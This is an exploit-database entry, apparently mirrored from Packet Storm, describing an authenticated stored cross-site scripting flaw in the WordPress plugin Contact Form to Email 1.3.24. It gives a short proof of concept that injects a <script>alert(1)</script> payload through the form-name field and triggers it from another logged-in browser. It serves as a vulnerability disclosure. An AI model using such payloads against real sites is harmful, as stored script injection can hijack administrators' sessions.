Exploit for WordPress Contact Form To Email 1.3.24 Cross Site Scripting

Name: Exploit for WordPress Contact Form To Email 1.3.24 Cross Site Scripting
Rating: 5 (233 reviews)

2021-11-15 | CVSS 7.1

## https://sploitus.com/exploit?id=PACKETSTORM:164965
# Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)  
# Date: 11/11/2021  
# Exploit Author: Mohammed Aadhil Ashfaq  
# Vendor Homepage: https://form2email.dwbooster.com/  
# Version: 1.3.24  
# Tested on: wordpress  
  
POC  
1. Click Contact form to Email  
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail  
2. Create new form name with <script>alert(1)</script>  
3. Click Publish  
4. XSS has been triggered  
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687  
5. Open a different browser, logged in with wordpress. Copy the URL and  
Press enter. XSS will trigger.